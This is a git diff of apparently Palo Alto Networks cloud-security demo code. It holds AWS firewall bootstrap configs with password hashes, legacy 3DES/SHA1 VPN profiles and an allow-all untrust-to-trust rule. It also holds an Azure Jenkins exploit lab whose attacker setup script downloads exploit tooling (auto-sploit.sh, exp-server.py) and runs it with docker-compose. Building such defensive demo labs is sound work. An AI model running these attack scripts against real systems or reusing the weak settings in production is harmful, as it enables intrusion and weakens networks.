+ + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$oxidaogq$toVFt6xD7ruJnTHYeVftq1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.10.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.20.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + 
untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.10.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt new file mode 100644 index 00000000..968814f6 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml new file mode 100644 index 00000000..32e7d2e8 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml @@ -0,0 +1,821 @@ + + + + + + $1$gyvolqhn$qTxyak3dNrZGte6mj5znJ. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg. 
+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.11.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.21.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.11.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
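The bootstrap.xml and init-cfg.txt files above are consumed by the VM-Series bootstrap process from an S3 bucket laid out with config/, content/, license/ and software/ prefixes, which is exactly the structure that create_s3_bootstrap.tf below uploads. A minimal Python sketch for sanity-checking that layout, assuming boto3 credentials are already configured and using a hypothetical bucket name:

# Sketch only: confirm a VM-Series bootstrap bucket exposes the expected top-level prefixes.
# The bucket name is hypothetical; create_s3_bootstrap.tf appends a random suffix to the real one.
import boto3

EXPECTED_PREFIXES = {"config/", "content/", "license/", "software/"}

def check_bootstrap_bucket(bucket_name):
    s3 = boto3.client("s3")
    keys = {obj["Key"] for obj in s3.list_objects_v2(Bucket=bucket_name).get("Contents", [])}
    # A prefix counts as present if it exists as a zero-byte "directory" object
    # (the Terraform uploads /dev/null for software/ and content/) or prefixes a real object.
    missing = {p for p in EXPECTED_PREFIXES
               if p not in keys and not any(k.startswith(p) for k in keys)}
    if missing:
        print("Missing bootstrap prefixes: " + ", ".join(sorted(missing)))
    return not missing

check_bootstrap_bucket("fw1-bootstrap-example")  # hypothetical name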
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt new file mode 100644 index 00000000..2fd77546 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/transitgateway-demo-v2/create_s3_bootstrap.tf b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf new file mode 100644 index 00000000..a4d0a15a --- /dev/null +++ b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf @@ -0,0 +1,161 @@ +#************************************************************************************ +# CREATE 2 S3 BUCKETS FOR FW1 & FW2 +#************************************************************************************ +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw1" { + bucket = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw2" { + bucket = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + + +#************************************************************************************ +# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw1/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw1/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw1/authcodes" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw2/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/fw2/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software2" { + bucket = 
"${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files/fw2/authcodes" +} + +resource "aws_s3_bucket_object" "content2" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + + +#************************************************************************************ +# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE +#************************************************************************************ +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role123" + + assume_role_policy = < This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment. The template deploy the Following: - Azure VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Security Groups. + Azure VNETS's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups. The Template will also deploy Palo Alto Networks Firewall with security posture. - # type of skillet (panos or panorama or template or terraform) type: python3 @@ -17,14 +16,14 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application variables: - name: username description: FW Username - default: admin + default: panadmin type_hint: text - name: password description: FW Password @@ -34,7 +33,77 @@ variables: description: Azure Resource Group default: cloud-security-framework-changeme type_hint: text - + - name: azure_region + description: Azure Region + default: centralus + type_hint: dropdown + dd_list: + - key: "West US" + value: "westus" + - key: "West US 2" + value: "westus2" + - key: "West Central US" + value: "westcentralus" + - key: "East US" + value: "eastus" + - key: "East US 2" + value: "eastus2" + - key: "Central US" + value: "centralus" + - key: "North Central US" + value: "northcentralus" + - key: "South Central US" + value: "southcentralus" + - key: "Canada Central" + value: "canadacentral" + - key: "Canada East" + value: "canadaeast" + - key: "UK West" + value: "ukwest" + - key: "UK South" + value: "uksouth" + - key: "North Europe" + value: "northeurope" + - key: "West Europe" + value: "westeurope" + - key: "Australia East" + value: "australiaeast" + - key: "Australia Southeast" + value: "australiasoutheast" + - key: "Australia Central" + value: "australiacentral" + - key: "Australia Central 2" + value: "australiacentral2" + - key: "East Asia" + value: "eastasia" + - key: "South East Asia" + value: "southeastasia" + - key: "Korea Central" + value: "koreacentral" + - key: "Korea South" + value: "koreasouth" + - key: "Japan West" + value: "japanwest" + - key: "Japan East" + value: "japaneast" + - key: "South India" + value: "southindia" + - key: "Central India" + value: "centralindia" + - key: "West India" + value: "westindia" + - key: "Brazil South" + value: "brazilsouth" + - key: "France Central" + value: "francecentral" + - key: 
"France South" + value: "francesouth" + # - name: azure_region + # description: Azure Region + # default: centralus + # type_hint: text + + # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file # to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined @@ -42,4 +111,3 @@ variables: snippets: - name: script file: ../../deploy.py - diff --git a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml index 597951fa..e96eb3c6 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -15,7 +15,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml index 96e2aa59..dd64f7ff 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml @@ -17,7 +17,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml index e6cce0e6..8e3c95eb 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml @@ -1,5 +1,5 @@ name: azure_login -label: Azure Login +label: Azure Login (Pre-Deployment Step) description: | This skillet will log into Azure. You will be prompted to follow a link and enter a device-code in your browser. @@ -14,7 +14,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application @@ -30,4 +30,4 @@ variables: # in the 'variables' section. 
snippets: - name: script - file: ../../azure_login.py \ No newline at end of file + file: ../../azure_login.py diff --git a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml index 189ed790..26e7925e 100644 --- a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml +++ b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml @@ -4,7 +4,6 @@ label: Azure Jenkins Security Framework Step 3 Send Command description: > This Skillet will allow you to interact and send commands to the exploited Jenkins system. - # type of skillet (panos or panorama or template or terraform) type: python3 @@ -15,7 +14,7 @@ extends: # Labels allow grouping and type specific options and are generally only used in advanced cases labels: - collection: Jenkins Security Framework + collection: Azure Jenkins Security Framework # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application diff --git a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars index 18e2a06e..9f03abf8 100644 --- a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars +++ b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars @@ -1,3 +1,3 @@ RG_Name = "" -Azure_Region = "central us" +Azure_Region = "" diff --git a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml index adf9834a..e528f907 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml +++ b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -741,13 +741,6 @@ - - - - download-and-install - - - diff --git a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf index 810c5293..14f0338f 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf +++ b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf @@ -53,6 +53,7 @@ resource "azurerm_application_gateway" "appgw1" { backend_address_pool_name = "webservers" backend_http_settings_name = "http" } + depends_on = ["data.azurerm_resource_group.resourcegroup"] } #### AppGW2 #### @@ -108,6 +109,7 @@ resource "azurerm_application_gateway" "appgw2" { backend_address_pool_name = "firewalls" backend_http_settings_name = "http" } + depends_on = ["data.azurerm_resource_group.resourcegroup"] } #### INTERNAL APP FACING LOAD BALANCER #### @@ -150,4 +152,4 @@ resource "azurerm_lb_rule" "webservers" { frontend_ip_configuration_name = "weblbip" backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" probe_id = "${azurerm_lb_probe.webservers.id}" -} \ No newline at end of file +} diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh index 3bf0b075..4cabd5ed 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh @@ -4,10 +4,10 @@ apt-get update apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes pip3 install docker-compose cd /var/tmp -wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/Dockerfile -wget 
https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/docker-compose.yml -wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/run.sh -wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/auto-sploit.sh -wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/exp-server.py +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml +wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py docker-compose build -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh index 55324851..bb37c3e5 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -7,11 +7,11 @@ cd /var/tmp echo "version: '3'" > docker-compose.yml echo "services:" >> docker-compose.yml echo " jenkins:" >> docker-compose.yml -echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml echo " environment:" >> docker-compose.yml echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml echo " ports:" >> docker-compose.yml echo " - \"50000:50000\"" >> docker-compose.yml echo " - \"8080:8080\"" >> docker-compose.yml -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh index afb0acd2..17b352c5 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh +++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh @@ -4,8 +4,8 @@ apt-get update apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes pip3 install docker-compose cd /var/tmp -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/Dockerfile -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/docker-compose.yml -wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/jenkins.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh docker-compose build -docker-compose up -d \ No newline at end of file +docker-compose up -d diff --git a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars index bb60d8f1..f56aa41c 100644 --- a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars +++ b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -1,6 +1,6 @@ Attack_RG_Name = "" -Azure_Region = "central us" +Azure_Region = "" Admin_Username = "" @@ -44,4 +44,4 @@ WebLB_IP = 
"10.0.4.10" Web_IP = "10.0.4.50" -Attack_IP = "10.1.1.50" \ No newline at end of file +Attack_IP = "10.1.1.50" diff --git a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf index 6ba878ef..da110808 100644 --- a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf +++ b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf @@ -134,7 +134,7 @@ resource "panos_security_policies" "security_policies" { hip_profiles = ["any"] destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] destination_addresses = ["any"] - applications = ["web-browsing", "jenkins"] + applications = ["web-browsing", "jenkins", "windows-azure-base"] services = ["service-http", "${panos_service_object.so_81.name}"] categories = ["any"] group = "Inbound" @@ -206,4 +206,4 @@ resource "panos_static_route_ipv4" "internal" { interface = "${panos_ethernet_interface.eth1_2.name}" destination = "${var.Web_Subnet_CIDR}" next_hop = "${var.FW_Internal_GW}" -} \ No newline at end of 